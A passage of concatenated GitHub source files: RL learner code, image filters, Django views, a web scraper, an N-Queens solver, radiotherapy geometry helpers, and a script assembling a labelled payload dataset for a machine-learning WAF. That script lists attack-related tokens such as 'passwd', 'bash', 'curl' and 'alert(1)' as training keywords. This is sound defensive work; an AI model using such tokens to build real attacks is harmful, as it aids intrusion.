self.optimizer.step()\n if self.scheduler is not None:\n self.scheduler.step()\n\n if self.iterations % self.sync_frequency == 0:\n self.policy.copy_target()\n lr = self.optimizer.state_dict()['param_groups'][0]['lr']\n self.writer.add_scalar(\"learning_rate\", lr, self.iterations)\n self.writer.add_scalar(\"loss_Qmix\", loss_qmix.item(), self.iterations)\n self.writer.add_scalar(\"loss_central\", loss_central.item(), self.iterations)\n self.writer.add_scalar(\"loss\", loss.item(), self.iterations)\n self.writer.add_scalar(\"predictQ\", q_tot_eval.mean().item(), self.iterations)\n","repo_name":"JoegameZhou/XuanPolicy","sub_path":"xuance_torch/learners/multi_agent_rl/wqmix_learner.py","file_name":"wqmix_learner.py","file_ext":"py","file_size_in_byte":4731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14540185656","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pathlib\n\ndef mean_filter(img):\n \n mean_size = 3\n ker = np.array([[1]*mean_size]*mean_size)/(mean_size**2)\n xs = img.shape[0]-(ker.shape[0]-1)\n ys = img.shape[1]-(ker.shape[1]-1)\n conv_mat = np.zeros((xs,ys))\n \n for i in range(xs):\n for j in range(ys):\n conv_mat[i][j] = (img[i:i+ker.shape[0],j:j+ker.shape[1]]*ker).sum()\n \n return conv_mat.astype(np.uint8)\n\ndef median_filter(img):\n median_size = 3\n ker = np.array([[1]*median_size]*median_size)\n xs = img.shape[0]-(ker.shape[0]-1)\n ys = img.shape[1]-(ker.shape[1]-1)\n conv_mat = np.zeros((xs,ys))\n \n for i in range(xs):\n for j in range(ys):\n conv_mat[i][j] = np.median(img[i:i+ker.shape[0],j:j+ker.shape[1]])\n\n return conv_mat.astype(np.uint8)\n\ndef img_hist(name,img):\n\n\n xs = img.shape[0]\n ys = img.shape[1]\n x = range(0,256)\n y = [0]*256\n for i in range(xs):\n for j in range(ys):\n y[img[i][j]] += 1\n\n fig = plt.figure(name)\n plt.ylim(0,4000)\n plt.bar(x,y)\n plt.savefig(name)\n\nif __name__ == '__main__':\n \n image = cv2.imread('noise_image.png',0) #read the image\n result_folder = \"result\"\n \n pathlib.Path(f\"{result_folder}\").mkdir(parents=True, exist_ok=True)\n \n image_mean = mean_filter(image)\n image_median = median_filter(image)\n img_hist(result_folder+'/img_hist',image)\n img_hist(result_folder+'/img_mean_hist',image_mean)\n img_hist(result_folder+'/img_median_hist',image_median)\n cv2.imwrite(result_folder+'/img_mean.png',image_mean)\n cv2.imwrite(result_folder+'/img_median.png',image_median)\n cv2.waitKey(0)","repo_name":"Meitaiyang/Image-Filtering","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70506213925","text":"from django.shortcuts import render, redirect\nfrom application.forms.itemsForm import itemForm\nfrom application.models.items import items\nfrom django.http import HttpResponse,JsonResponse\nfrom application.authenticate import Authentication\n\n\n# @Authentication.valid_user\n# def item(request):\n# item = items.objects.all();\n# return render(request, \"items/items.html\",{'item':item})\n\n@Authentication.valid_user\ndef item(request):\n limit=7\n page=1\n if request.method==\"POST\":\n if \"next\" in request.POST:\n page=(int(request.POST['page'])+1)\n elif \"prev\" in request.POST:\n page=(int(request.POST['page'])-1)\n tempoffset=page-1\n offset=tempoffset*limit\n item=items.objects.raw(\"select * from items where user_id = %s limit 7 offset %s\",[request.session['user_id'], 
offset])\n else:\n item=items.objects.raw(\"select * from items where user_id = %s limit 7 offset 0\",[request.session['user_id']])\n return render (request,\"items/items.html\",{'item':item, 'page': page})\n\n\n@Authentication.valid_user\ndef newItem(request):\n if request.method == \"POST\":\n if not request.POST._mutable:\n request.POST._mutable = True\n request.POST['user'] = request.session['user_id']\n itemsForm = itemForm(request.POST)\n itemsForm.save()\n return redirect(\"/items\")\n itemsForm = itemForm()\n return render(request, \"items/NewItems.html\",{'itemsForm':itemsForm})\n\n@Authentication.valid_user_include_id\ndef editItem(request,id):\n item = items.objects.get(id=id)\n return render(request,'items/editItems.html',{'item':item})\n\n@Authentication.valid_user_include_id\ndef update_item(request,id):\n item=items.objects.get(id=id)\n if not request.POST._mutable:\n request.POST._mutable = True\n request.POST['user'] = request.session['user_id']\n form=itemForm(request.POST,instance=item)\n form.save()\n return redirect('/items')\n\n@Authentication.valid_user_include_id\ndef delete_item(request, id):\n item = items.objects.get(id=id)\n item.delete()\n return redirect('/items')\n\n@Authentication.valid_user\ndef searchItem(request):\n item = items.objects.filter(item_name__icontains = request.GET['searchItem'],user_id=request.session['user_id']).values()\n return JsonResponse(list(item),safe=False)\n","repo_name":"PukarSubedi01/Web-Project","sub_path":"WebAssignment/accounting/application/views/itemsView.py","file_name":"itemsView.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74034525925","text":"import bs4 as bs\n # may need to change to bs3 dpepending on pythoon version\nimport urllib.request\n# import tkinter as tk\n# from tkinter.simpledialog import askstring, askinteger\n# from tkinter.messagebox import showerror\nimport string\nfrom unidecode import unidecode\n\n'''\n# it looks like having a dialog box is a lot of work; for future reference:\n https://stackoverflow.com/questions/40251509/how-to-open-a-tkinter-dialog-box-and-use-the-result-later-in-the-program\n https://stackoverflow.com/questions/10057672/correct-way-to-implement-a-custom-popup-tkinter-dialog-box\n https://stackoverflow.com/questions/34830906/taking-integer-and-string-input-from-gui-in-python\n\ndef string_from_dialog(title, text):\n root = Tk()\n root.result = simpledialog.askstring(title, text)\n root.withdraw()\n return root.result\n'''\n\ndef get_links(page):\n source = urllib.request.urlopen(page).read()\n soup = bs.BeautifulSoup(source, \"lxml\")\n links = []\n body = soup.body\n for paragraph in body.find_all(\"p\"):\n for url in paragraph.find_all(\"a\"):\n links.append(url.get(\"href\"))\n\n return links\n\n\ndef get_text(page):\n source = urllib.request.urlopen(page).read()\n soup = bs.BeautifulSoup(source, \"lxml\")\n text = []\n body = soup.body\n for paragraph in body.find_all(\"p\"):\n text.append(paragraph.text)\n text = \" \".join(text)\n new_text = text\n length = len(text)\n # print()\n # print(\"length:\",length)\n for i in range(len(text)):\n if text[length-i-1] == \"[\":\n # print(\"i:\",length-i-1)\n # new_text = new_text[:length-i-2] + new_text[length-i+1:]\n\n for j in range(i+1):\n # print(\"j:\",j,text[j+length-i-1])\n if text[j+length-i-1] == \"]\":\n\n new_text = new_text[:length-i-1] + new_text[length-i+j:]\n break\n\n\n rtn = unidecode(new_text)\n '''\n rtn = 
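# --- Editor's aside: the reverse scan in get_text above strips bracketed wiki
# citation markers such as '[3]' or '[citation needed]'. A single regex pass
# does the same job; sketch (not part of the original scraper):
import re
from unidecode import unidecode

def strip_citations(text):
    # drop non-nested [...] spans, then transliterate to plain ASCII
    return unidecode(re.sub(r'\[[^\[\]]*\]', '', text))

# strip_citations('Veiki moraine[3] is a landform[citation needed].')
# -> 'Veiki moraine is a landform.'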
\"\"\n new_text = new_text.replace(\"\\u2013\", \"-\")\n new_text = new_text.replace(\"\\u2014\", \"--\")\n\n for char in new_text:\n if char in string.printable:\n rtn += char\n '''\n\n\n return rtn\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n print()\n print(get_text(\"https://en.wikipedia.org/wiki/Veiki_moraine\"))\n","repo_name":"bvorjohan/Wikipedia-Game","sub_path":"Scraper.py","file_name":"Scraper.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38896970974","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\nfrom multiprocessing import Pool\nfrom page_parsing import get_item_info_from, url_list, item_info, get_links_from\nfrom channel_extracing import channel_list\n\ndb_urls = [item['url'] for item in url_list.find()]\nindex_urls = [item['url'] for item in item_info.find()]\nx = set(db_urls)\ny = set(index_urls)\nrest_of_urls = x-y\n\ndef get_all_links_from(channel):\n for i in range(1, 100):\n get_links_from(channel, i)\n\n\nif __name__ == '__main__':\n pool = Pool(processes=6)\n # pool.map(get_all_links_from, channel_list) # 抓取所有商品链接(只需抓一次,此处未支持断点功能)\n pool.map(get_item_info_from, rest_of_urls) # 抓取商品详情页\n pool.close()\n pool.join()\n","repo_name":"mugglecoding/Plan-for-combating","sub_path":"week2/week2_homework/ganji/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":211,"dataset":"github-code","pt":"52"} +{"seq_id":"37338228953","text":"import re\nimport os\nimport sys\n\n\ndef handle_file(filename):\n filename = filename.strip()\n if not os.path.exists(filename): return\n fin = open(filename)\n lines = [line.strip() for line in fin.read().split(\"\\n\") if line.strip() != \"\"]\n fin.close()\n fout = open(filename, \"w\")\n title = lines[0]\n title = re.sub(r'^[# ]*', '', title).strip()\n print(\"# \" + title + \"\\n\", file=fout)\n for line in lines[1:]:\n line = re.sub(r\"^([a-zA-Z].*?:)\", \"**\\\\1**\", line)\n print(line + \"\\n\", file=fout)\n fout.close()\n\n\nfor line in sys.stdin:\n handle_file(line)\n","repo_name":"lzyerste/wiki2","sub_path":"en/pages/english/friends/re_md.py","file_name":"re_md.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5251575218","text":"\"\"\"\nThis module contains a function which evaluates the classifier and logs the wrongly classified instances\n\"\"\"\n\n# importing csv for error tracking\nimport csv\n\ndef logErrorsInCSV(classifier,filename):\n \"\"\"\n This function evaluates the classifier and logs the wrongly classified instances.\n\n Input:\n classifier: trained MindMeld classifier\n filename: name of file in which evaluation results should be stored in\n\n Returns:\n Nothing.\n \"\"\"\n\n eval = classifier.evaluate()\n print(eval.get_stats()['stats_overall']['accuracy'])\n\n # writing incorrect results to .csv file\n out = csv.writer(open(filename,\"w\"), delimiter=';',quoting=csv.QUOTE_ALL)\n out.writerows(list(eval.incorrect_results()))","repo_name":"ptrckhmmr/ChatBot-for-cultural-institutions","sub_path":"Chatbot_DebuggingVersion/app/utilities/logErrors.py","file_name":"logErrors.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"293999369","text":"def print_board(board):\r\n for row in board:\r\n print(' '.join(row))\r\n 
print()\r\n\r\ndef is_safe(board, row, col, n):\r\n for i in range(col):\r\n if board[row][i] == 'Q':\r\n return False\r\n for i, j in zip(range(row, -1, -1), range(col, -1, -1)):\r\n if board[i][j] == 'Q':\r\n return False\r\n for i, j in zip(range(row, n, 1), range(col, -1, -1)):\r\n if board[i][j] == 'Q':\r\n return False\r\n \r\n return True\r\n\r\ndef solve_n_queens(board, col, n):\r\n if col == n:\r\n print_board(board)\r\n return True\r\n \r\n res = False\r\n for i in range(n):\r\n if is_safe(board, i, col, n):\r\n board[i][col] = 'Q'\r\n \r\n res = solve_n_queens(board, col + 1, n) or res\r\n \r\n board[i][col] = '.'\r\n \r\n return res\r\n\r\nn = int(input(\"Enter the value of n: \"))\r\nboard = [['.' for _ in range(n)] for _ in range(n)]\r\nsolve_n_queens(board, 0, n)\r\n\r\n","repo_name":"VenuAtluri2251421/dsa-lab","sub_path":"exp-11.py","file_name":"exp-11.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11437534282","text":"import numpy as np\n\n\ndef _unit_vector(data, axis=None, out=None):\n \"\"\" Return ndarray normalized by length, i.e. Euclidean norm, along axis.\n\n >>> v0 = np.random.random(3)\n >>> v1 = _unit_vector(v0)\n >>> np.allclose(v1, v0 / np.linalg.norm(v0))\n True\n >>> v0 = np.random.rand(5, 4, 3)\n >>> v1 = _unit_vector(v0, axis=-1)\n >>> v2 = v0 / np.expand_dims(np.sqrt(np.sum(v0*v0, axis=2)), 2)\n >>> np.allclose(v1, v2)\n True\n >>> v1 = _unit_vector(v0, axis=1)\n >>> v2 = v0 / np.expand_dims(np.sqrt(np.sum(v0*v0, axis=1)), 1)\n >>> np.allclose(v1, v2)\n True\n >>> v1 = np.empty((5, 4, 3))\n >>> _unit_vector(v0, axis=1, out=v1)\n >>> np.allclose(v1, v2)\n True\n >>> list(_unit_vector([]))\n []\n >>> list(_unit_vector([1]))\n [1.0]\n\n \"\"\"\n if out is None:\n data = np.array(data, dtype=np.float64, copy=True)\n if data.ndim == 1:\n data /= np.sqrt(np.dot(data, data))\n return data\n else:\n if out is not data:\n out[:] = np.array(data, copy=False)\n data = out\n length = np.atleast_1d(np.sum(data * data, axis))\n np.sqrt(length, length)\n if axis is not None:\n length = np.expand_dims(length, axis)\n data /= length\n if out is None:\n return data\n\n\ndef rotation_matrix(th):\n \"\"\"\n :param th: vector of radians for rotation in x, y, z axis respectively\n :return: 3x3 rotation matrix\n \"\"\"\n Rx = [[1., 0., 0.],\n [0., np.cos(-th[0]), -np.sin(-th[0])],\n [0., np.sin(-th[0]), np.cos(-th[0])]]\n\n Ry = [[np.cos(-th[1]), 0., np.sin(-th[1])],\n [0., 1., 0.],\n [-np.sin(-th[1]), 0., np.cos(-th[1])]]\n\n Rz = [[np.cos(-th[2]), -np.sin(-th[2]), 0.],\n [np.sin(-th[2]), np.cos(-th[2]), 0.],\n [0., 0., 1.]]\n return np.dot(Rx, np.dot(Ry, Rz))\n\n\ndef _projection_matrix(point, normal, direction=None,\n perspective=None, pseudo=False):\n \"\"\"Return matrix to project onto plane defined by point and normal.\n\n Using either perspective point, projection direction, or none of both.\n\n If pseudo is True, perspective projections will preserve relative depth\n such that Perspective = dot(Orthogonal, PseudoPerspective).\n\n >>> P = _projection_matrix([0, 0, 0], [1, 0, 0])\n >>> np.allclose(P[1:, 1:], np.identity(4)[1:, 1:])\n True\n >>> point = np.random.random(3) - 0.5\n >>> normal = np.random.random(3) - 0.5\n >>> direct = np.random.random(3) - 0.5\n >>> persp = np.random.random(3) - 0.5\n >>> P0 = _projection_matrix(point, normal)\n >>> P1 = _projection_matrix(point, normal, direction=direct)\n >>> P2 = _projection_matrix(point, normal, 
perspective=persp)\n >>> P3 = _projection_matrix(point, normal, perspective=persp, pseudo=True)\n >>> P = _projection_matrix([3, 0, 0], [1, 1, 0], [1, 0, 0])\n >>> v0 = (np.random.rand(4, 5) - 0.5) * 20\n >>> v0[3] = 1\n >>> v1 = np.dot(P, v0)\n >>> np.allclose(v1[1], v0[1])\n True\n >>> np.allclose(v1[0], 3-v1[1])\n True\n\n \"\"\"\n M = np.identity(4)\n point = np.array(point[:3], dtype=np.float64, copy=False)\n normal = _unit_vector(normal[:3])\n if perspective is not None:\n # perspective projection\n perspective = np.array(perspective[:3], dtype=np.float64,\n copy=False)\n M[0, 0] = M[1, 1] = M[2, 2] = np.dot(perspective - point, normal)\n M[:3, :3] -= np.outer(perspective, normal)\n if pseudo:\n # preserve relative depth\n M[:3, :3] -= np.outer(normal, normal)\n M[:3, 3] = np.dot(point, normal) * (perspective + normal)\n else:\n M[:3, 3] = np.dot(point, normal) * perspective\n M[3, :3] = -normal\n M[3, 3] = np.dot(perspective, normal)\n elif direction is not None:\n # parallel projection\n direction = np.array(direction[:3], dtype=np.float64, copy=False)\n scale = np.dot(direction, normal)\n M[:3, :3] -= np.outer(direction, normal) / scale\n M[:3, 3] = direction * (np.dot(point, normal) / scale)\n else:\n # orthogonal projection\n M[:3, :3] -= np.outer(normal, normal)\n M[:3, 3] = np.dot(point, normal) * normal\n return M\n\n\ndef proj_iso_plane(pts, sad, gantry_deg, collimator_deg=90.0):\n # pts = pts.copy()\n \"\"\"\n ssd: source to axis distance\n gantry_ang: gantry rotation angle\n collimator_deg: collimator rotation angle\n pts: point or matrix of column vectors\n \"\"\"\n rot = [0.0, np.radians(collimator_deg), np.radians(gantry_deg)]\n src = [0, -sad, 0]\n pts_r = np.dot(rotation_matrix(rot), pts)\n\n pts_r = np.vstack((pts_r, np.ones(pts_r.shape[1])))\n pts_r = np.dot(_projection_matrix([0., 0., 0.], [0., 1., 0.], perspective=src), pts_r)\n pts_r = np.divide(pts_r[:3], pts_r[3])\n return pts_r\n","repo_name":"VarianAPIs/PyESAPI","sub_path":"pyesapi/tools/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","stars":58,"dataset":"github-code","pt":"52"} +{"seq_id":"28111448258","text":"# Napisz program, który będzie akceptował sekwencje słów\r\n# oddzielonych od siebie spacją i usunie duplikaty oraz zwróci\r\n# słowa posortowane alfanumerycznie.\r\n\r\nwyrazy = input(\"wpisz wyrazy oddzielone spacją: \")\r\nlista = sorted(wyrazy.split(\" \"))\r\nwynik =[]\r\nfor wyraz in lista:\r\n x = lista.count(wyraz)\r\n while x > 1:\r\n lista.remove(wyraz)\r\n x -= 1\r\n wynik.append(wyraz)\r\nprint(wynik)","repo_name":"Szyszuniec/100-zada-","sub_path":"zadanie 10.py","file_name":"zadanie 10.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27692335322","text":"import random\nfrom itertools import chain\nimport pandas as pd\nfrom helpers.ioutils import SimpleFile\n\n\nclass DataSetProcessor:\n\n # def __init__(self):\n # pass\n\n @staticmethod\n def CreateBalancedDataSet():\n data_set = pd.read_csv(\"data/final/final.csv\")\n\n final_samples = {\"payload\": [], \"category\": []}\n categories = [\"xss\", \"xxe\", \"injection\", \"rce\", \"crlf\", \"deserialize\", \"lfi-ldf\", \"openredirect\", \"clean\"]\n\n # data_set = pd.DataFrame()\n for index, row in data_set.iterrows():\n if row[\"category\"] in categories:\n # print(row['category'])\n if KeyExist(row[\"category\"], final_samples):\n\n if 
CountKeys(row[\"category\"], final_samples) <= 400:\n final_samples[\"payload\"].append(row[\"payload\"])\n final_samples[\"category\"].append(row[\"category\"])\n else:\n continue\n else:\n if CountKeys(row[\"category\"], final_samples) <= 400:\n final_samples[\"payload\"].append(row[\"payload\"])\n final_samples[\"category\"].append(row[\"category\"])\n\n interesting_clean_keywords = [\"xss\", \"crlf\", \"xxe\", \"sqli\", \"injection\", \"lfi\", \"passwd\", \"etc\", \"onmouseover\",\n \"onload\", \"192.168.1.100:9887\", \"127.0.0.1\", \"10.255.255.255\", \"host\", \"localhost\"\n \"10.0.0.0\",\n \"172.31.255.255\", \"192.168.255.255\", \"192.168.0.0\", \"172.16.0.0\", \"wait\", \"count\",\n \"select\", \"google\", \"google.com\", \"www.google.com\", \"alert\", \"alert(1)\"\n \"bin\", \"bash\",\n \"curl\", \"where\", \"char\", \"exec\", \"cgi\", \"extractvalue\", \"1\", \"2\", \"3\"\n \"tftp\",\n \"192.168\", \"192.\", \"127.\", \"'\", \"<>\",\n \"example.com\", \"cmd\", \"<>@!@#$%^&*()_+\", \"example.com<<>>@\",\n \"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/36.0.1985.125 Safari/537.36\"]\n\n for item in interesting_clean_keywords:\n final_samples[\"payload\"].append(item)\n final_samples[\"category\"].append(\"clean\")\n # print(len(final_samples[\"payload\"]))\n final_samples = pd.DataFrame.from_dict(final_samples).sample(frac=1, random_state=555)\n final_samples.to_csv(\"data/final/final_sampled.csv\", index=False)\n print(\"Final sample created in data directory as well\")\n\n @staticmethod\n def ProcessDataSets():\n rce = [] # unix , windows, powershell, SSTI\n injection = [] # ldap, sql , nosql\n xss = [] # variants\n xxe = [] # variants\n lfi_lfd = [] # also sensitive files\n open_redirect = []\n crlf = []\n deserialize = []\n clean = []\n\n # # some entities from OWASP coreruleset\n\n SimpleFile.AppendFileToList(lfi_lfd, \"data/sources/coreruleset/lfi.txt\")\n SimpleFile.AppendFileToList(rce, \"data/sources/coreruleset/powershell.txt\")\n SimpleFile.AppendFileToList(rce, \"data/sources/coreruleset/rce.txt\")\n\n # entities from payloadidentifier\n\n SimpleFile.AppendFileToList(lfi_lfd, \"data/sources/payloadidentifer/datasets/file-inclusion/ALL_FILES.txt\")\n SimpleFile.AppendFileToList(lfi_lfd, \"data/sources/payloadidentifer/datasets/path-traversal/ALL_FILES.txt\")\n SimpleFile.AppendFileToList(rce, \"data/sources/payloadidentifer/datasets/rce/ALL_FILES.txt\")\n SimpleFile.AppendFileToList(injection, \"data/sources/payloadidentifer/datasets/sql/ALL_FILES.txt\")\n SimpleFile.AppendFileToList(xss, \"data/sources/payloadidentifer/datasets/xss/ALL_FILES.txt\")\n SimpleFile.AppendFileToList(xxe, \"data/sources/payloadidentifer/datasets/xxe/ALL_FILES.txt\")\n\n # entities from PayloadAllTheThings\n\n SimpleFile.AppendDirToList(lfi_lfd, 'data/sources/PayloadsAllTheThings/Directory Traversal/')\n SimpleFile.AppendDirToList(lfi_lfd, 'data/sources/PayloadsAllTheThings/File Inclusion/')\n SimpleFile.AppendDirToList(lfi_lfd, 'data/sources/PayloadsAllTheThings/Insecure Management Interface')\n SimpleFile.AppendDirToList(rce, 'data/sources/PayloadsAllTheThings/Command Injection/')\n SimpleFile.AppendDirToList(injection, 'data/sources/PayloadsAllTheThings/SQL Injection/')\n SimpleFile.AppendDirToList(injection, 'data/sources/PayloadsAllTheThings/LDAP Injection/')\n SimpleFile.AppendDirToList(injection, 'data/sources/PayloadsAllTheThings/NoSQL Injection/')\n SimpleFile.AppendDirToList(crlf, 'data/sources/PayloadsAllTheThings/CRLF Injection/')\n 
SimpleFile.AppendDirToList(xss, 'data/sources/PayloadsAllTheThings/XSS Injection/')\n SimpleFile.AppendDirToList(xxe, 'data/sources/PayloadsAllTheThings/XXE Injection/')\n SimpleFile.AppendDirToList(open_redirect, 'data/sources/PayloadsAllTheThings/Open Redirect/')\n\n # # entities from BURP XSS Cheat sheet\n #\n SimpleFile.AppendFileToList(xss, 'data/sources/burp_xss_cheatsheet.txt')\n\n # # deserialization\n SimpleFile.AppendFileToList(deserialize, 'data/sources/ysoserial_payloads.txt')\n\n # entities from ML based WAF\n\n # print(MlJson['type'].unique())\n # MLJsonTypes = ['valid' 'xss' 'sqli' 'path-traversal' 'cmdi']\n\n MlJson = pd.read_json('data/sources/ml_based_waf.json')\n\n clean.append(MlJson.where(MlJson['type'] == 'valid').dropna(thresh=1)['pattern'].values.tolist())\n injection.append(MlJson.where(MlJson['type'] == 'sqli').dropna(thresh=1)['pattern'].values.tolist())\n xss.append(MlJson.where(MlJson['type'] == 'xss').dropna(thresh=1)['pattern'].values.tolist())\n rce.append(MlJson.where(MlJson['type'] == 'cmdi').dropna(thresh=1)['pattern'].values.tolist())\n lfi_lfd.append(MlJson.where(MlJson['type'] == 'path-traversal').dropna(thresh=1)['pattern'].values.tolist())\n\n # entities from ML based WAF CSV\n\n # print(MlCsv['injection_type'].unique())\n # ['LEGAL' 'XSS' 'SHELL' 'SQL']\n\n MlCsv = pd.read_csv('data/sources/ml_base_waf_payloads.csv')\n # clean.append(MlCsv.where(MlCsv['injection_type'] == 'LEGAL').dropna(thresh=1)['payload'].values.tolist())\n injection.append(MlCsv.where(MlCsv['injection_type'] == 'SQL').dropna(thresh=1)['payload'].values.tolist())\n rce.append(MlCsv.where(MlCsv['injection_type'] == 'SHELL').dropna(thresh=1)['payload'].values.tolist())\n xss.append(MlCsv.where(MlCsv['injection_type'] == 'XSS').dropna(thresh=1)['payload'].values.tolist())\n\n # # entities from MSS WAF\n #\n # # print(MSSCvs['injection_type'].unique())\n # # ['LEGAL' 'XSS' 'SHELL' 'SQL']\n #\n MSSCvs = pd.read_csv('data/sources/mss_waf_allpayload.csv')\n\n # clean.append(MSSCvs.where(MSSCvs['injection_type'] == 'LEGAL').dropna(thresh=1)['payload'].values.tolist())\n injection.append(MSSCvs.where(MSSCvs['injection_type'] == 'SQL').dropna(thresh=1)['payload'].values.tolist())\n rce.append(MSSCvs.where(MSSCvs['injection_type'] == 'SHELL').dropna(thresh=1)['payload'].values.tolist())\n xss.append(MSSCvs.where(MSSCvs['injection_type'] == 'XSS').dropna(thresh=1)['payload'].values.tolist())\n #\n\n # entities from WAF dataset\n\n # print(MSSCvs['injection_type'].unique())\n # ['LEGAL' 'XSS' 'SHELL' 'SQL']\n\n WAFCsv = pd.read_csv('data/sources/waf_dataset.csv')\n # print(WAFCsv['Types'].unique())\n # ['xss' 'sql' 'nosql' 'lfi' 'shell' 'ssti' 'crlf' 'ssi' 'valid']\n\n clean.append(WAFCsv.where(WAFCsv['Types'] == 'valid').dropna(thresh=1)['Payloads'].values.tolist())\n injection.append(WAFCsv.where(WAFCsv['Types'] == 'nosql').dropna(thresh=1)['Payloads'].values.tolist())\n injection.append(WAFCsv.where(WAFCsv['Types'] == 'sql').dropna(thresh=1)['Payloads'].values.tolist())\n rce.append(WAFCsv.where(WAFCsv['Types'] == 'shell').dropna(thresh=1)['Payloads'].values.tolist())\n rce.append(WAFCsv.where(WAFCsv['Types'] == 'ssi').dropna(thresh=1)['Payloads'].values.tolist())\n xss.append(WAFCsv.where(WAFCsv['Types'] == 'xss').dropna(thresh=1)['Payloads'].values.tolist())\n rce.append(WAFCsv.where(WAFCsv['Types'] == 'ssti').dropna(thresh=1)['Payloads'].values.tolist())\n crlf.append(WAFCsv.where(WAFCsv['Types'] == 'crlf').dropna(thresh=1)['Payloads'].values.tolist())\n 
lfi_lfd.append(WAFCsv.where(WAFCsv['Types'] == 'lfi').dropna(thresh=1)['Payloads'].values.tolist())\n\n injection_final_total = list(chain.from_iterable(injection))\n injection_final_unique = set(injection_final_total)\n\n print(\"#\" * 20 + \" Payload Information \" + \"#\" * 20)\n print(\"Total Injection (SQL/NoSQL) Payloads: \" + str(len(injection_final_total)) +\n \"\\nTotal unique (SQL/NoSQL) payloads: \" +\n str(len(injection_final_unique)))\n\n rce_final_total = list(chain.from_iterable(rce))\n rce_final_unique = set(rce_final_total)\n\n print(\"Total RCE Payloads: \" + str(len(rce_final_total)) + \"\\nTotal unique payloads: \" +\n str(len(rce_final_unique)))\n\n final_lfi_lfd_total = list(chain.from_iterable(lfi_lfd))\n final_lfi_lfd_unique = set(final_lfi_lfd_total)\n\n print(\"Total LFI/LFD Payloads: \" + str(len(final_lfi_lfd_total)) + \"\\nTotal unique LFI/LFD payloads: \" +\n str(len(final_lfi_lfd_unique)))\n\n final_xss_total = list(chain.from_iterable(xss))\n final_xss_unique = set(final_xss_total)\n\n print(\"Total XSS Payloads: \" + str(len(final_xss_total)) + \"\\nTotal unique XSS payloads: \" +\n str(len(final_xss_unique)))\n\n final_crlf_total = list(chain.from_iterable(crlf))\n final_crfl_unique = set(final_crlf_total)\n\n print(\"Total CRLF Payloads: \" + str(len(final_crlf_total)) + \"\\nTotal unique CRLF payloads: \" +\n str(len(final_crfl_unique)))\n\n final_xxe_total = list(chain.from_iterable(xxe))\n final_xxe_unique = set(final_xxe_total)\n\n print(\"Total XXE Payloads: \" + str(len(final_xxe_total)) + \"\\nTotal unique XXE payloads: \" +\n str(len(final_xxe_unique)))\n\n final_openredirect_total = list(chain.from_iterable(open_redirect))\n final_openredirect_unique = set(final_openredirect_total)\n\n print(\"Total OpenRedirect Payloads: \" + str(\n len(final_openredirect_total)) + \"\\nTotal unique OpenRedirect payloads: \" +\n str(len(final_openredirect_unique)))\n\n final_deserialize_total = list(chain.from_iterable(deserialize))\n final_deserialize_unique = set(final_deserialize_total)\n\n print(\"Total Deserialize Payloads: \" + str(\n len(final_deserialize_total)) + \"\\nTotal unique Deserialize payloads: \" +\n str(len(final_deserialize_unique)))\n\n final_clean_total = list(chain.from_iterable(clean))\n final_clean_unique = set(final_clean_total)\n\n print(\"#\" * 20 + \" Total Malicious Payloads \" + \"#\" * 20)\n total_malicious = len(final_deserialize_total) + len(final_xss_total) + len(final_xxe_unique) + len(\n injection_final_unique) + \\\n len(final_openredirect_unique) + len(final_crfl_unique) + len(final_openredirect_total) + len(\n rce_final_unique)\n print(\"Total : \" + str(total_malicious))\n\n print(\"Total Clean Payloads: \" + str(len(final_clean_total)) + \"\\nTotal unique Clean payloads: \" +\n str(len(final_clean_unique)))\n\n # print(\"How much more clean data we have\")\n # diff = len(final_clean_unique) - total_malicious\n # percent = format(diff / len(final_clean_unique), \".2f\")\n\n # get unique payloads with more 500 samples and fix random state\n sample_needed = int(total_malicious / 2)\n clean_df = pd.DataFrame(final_clean_unique, columns=['Payloads'])\n clean_final_balance = clean_df.sample(n=sample_needed, replace=False, random_state=555).values.tolist()\n\n print(\"Selected Clean Samples : \" + str(len(clean_final_balance)))\n\n # let's finally merge and shuffle\n final_list = {\"payload\": [], \"category\": []}\n\n for item in injection_final_unique:\n final_list[\"payload\"].append(item)\n 
final_list[\"category\"].append(\"injection\")\n\n for item in rce_final_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"rce\")\n\n for item in final_xss_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"xss\")\n\n for item in final_xxe_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"xxe\")\n\n for item in final_crfl_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"crlf\")\n\n for item in final_lfi_lfd_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"lfi-ldf\")\n\n for item in final_openredirect_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"openredirect\")\n\n for item in final_deserialize_unique:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"deserialize\")\n\n for item in clean_final_balance:\n final_list[\"payload\"].append(item)\n final_list[\"category\"].append(\"clean\")\n\n finale = {\"payload\": final_list[\"payload\"], \"category\": 